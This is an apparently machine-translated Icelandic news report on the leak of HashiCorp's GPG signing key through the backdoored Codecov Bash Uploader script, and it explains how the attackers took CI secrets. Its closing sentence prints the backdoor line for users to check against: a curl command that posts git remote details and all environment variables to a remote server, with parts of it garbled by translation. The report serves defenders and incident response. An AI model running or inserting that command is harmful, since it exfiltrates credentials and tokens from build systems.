HashiCorp, þekkt fyrir að þróa opinn hugbúnaðinn Vagrant, Packer, Nomad og Terraform, tilkynnti um leka á einka GPG lyklinum sem notaður er til að búa til stafrænar undirskriftir sem staðfesta útgáfur. Árásarmenn sem fengu aðgang að GPG lyklinum gætu hugsanlega gert faldar breytingar á HashiCorp vörum með því að staðfesta þær með réttri stafrænni undirskrift. Jafnframt sagði fyrirtækið að við úttektina hafi ekki komið fram nein ummerki um tilraunir til slíkra breytinga.
Eins og er hefur málamiðlunarlykillinn GPG verið afturkallaður og nýr lykill hefur verið kynntur í staðinn. Vandamálið hafði aðeins áhrif á sannprófun með því að nota SHA256SUM og SHA256SUM.sig skrárnar og hafði ekki áhrif á myndun stafrænna undirskrifta fyrir Linux DEB og RPM pakka sem eru afhentir í gegnum releases.hashicorp.com, sem og útgáfustaðfestingarkerfi fyrir macOS og Windows (AuthentiCode) .
Lekinn átti sér stað vegna notkunar á Codecov Bash Uploader (codecov-bash) handritinu í innviðum, hannað til að hlaða niður umfjöllunarskýrslum frá samfelldum samþættingarkerfum. Á meðan á árásinni stóð á Codecov fyrirtækinu var bakdyr falin í tilgreindu handriti, þar sem lykilorð og dulkóðunarlyklar voru sendir á netþjón árásarmannanna.
Til að hakka nýttu árásarmennirnir sér villu í því ferli að búa til Codecov Docker myndina, sem gerði þeim kleift að vinna út aðgangsgögn að GCS (Google Cloud Storage), nauðsynleg til að gera breytingar á Bash Uploader handritinu sem dreift er frá codecov.io vefsíðu. Breytingarnar voru gerðar aftur þann 31. janúar, sáust ekki í tvo mánuði og gerðu árásarmönnum kleift að vinna út upplýsingar sem geymdar voru í samfelldu samþættingarkerfi viðskiptavina. Með því að nota viðbættan illgjarnan kóða gætu árásarmenn fengið upplýsingar um prófuðu Git geymsluna og allar umhverfisbreytur, þar á meðal tákn, dulkóðunarlykla og lykilorð send til samfelldra samþættingarkerfa til að skipuleggja aðgang að forritakóða, geymslum og þjónustu eins og Amazon Web Services og GitHub.
Til viðbótar við beina símtalið var Codecov Bash Uploader handritið notað sem hluti af öðrum upphleðsluaðilum, svo sem Codecov-action (Github), Codecov-circleci-orb og Codecov-bitrise-step, en notendur þeirra hafa einnig áhrif á vandamálið. Mælt er með öllum notendum codecov-bash og tengdra vara að endurskoða innviði þeirra, sem og breyta lykilorðum og dulkóðunarlyklum. Þú getur athugað hvort bakdyr séu til staðar í handriti með tilvist línukrulla -sm 0.5 -d “$(git remote -v)<<<<<< ENV $(env)” http:// /hlaða/v2 || satt
Heimild: opennet.ru